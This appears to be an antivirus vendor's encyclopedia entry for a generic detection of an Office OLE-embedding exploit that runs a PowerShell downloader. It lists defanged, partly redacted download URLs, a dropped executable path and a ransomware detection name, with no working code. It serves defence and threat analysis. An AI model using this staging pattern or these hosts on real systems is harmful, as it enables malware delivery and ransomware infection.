Analysis
LNK/Agent.IA!tr.dldr is a generic detection for a Office OLE embedding Exploit/Powershell Downloader.
Since this is a generic detection, malware that are detected as LNK/Agent.IA!tr.dldr may have varying behaviour.
Below are examples of some of its characteristics/behaviours:
- Using an MSOffice OLE embedding exploit, this malware intends to issue a powershell comamnd that will download from hxxp://"ni{Removed}.be/kjh765e46 which is a script afterwhich executes and downloads from the following :
- hxxp://internet-webs{Removed}.de/O77enbdGF5
- hxxp://ist-pr{Removed}.ru/O77enbdGF5
- hxxp://lvps212-67-205-60.vps.webf{Removed}.co.uk/O77enbdGF5
- hxxp://matternomat{Removed}.com/O77enbdGF5
- hxxp://m.monteschi{Removed}.com/O77enbdGF5
- hxxp://minascriptand{Removed}.nl/O77enbdGF5
- hxxp://hilaryandsa{Removed}.com/O77enbdGF5
- hxxp://verwadirep{Removed}.info/p66/O77enbdGF5
The downloaded file, is located at %Temp%/envbit32.exe, is currently detected as W32/Kryptik.FYKM!tr.ransom.
Below is an example of an infected document:
- Figure 1: Infected Document.
|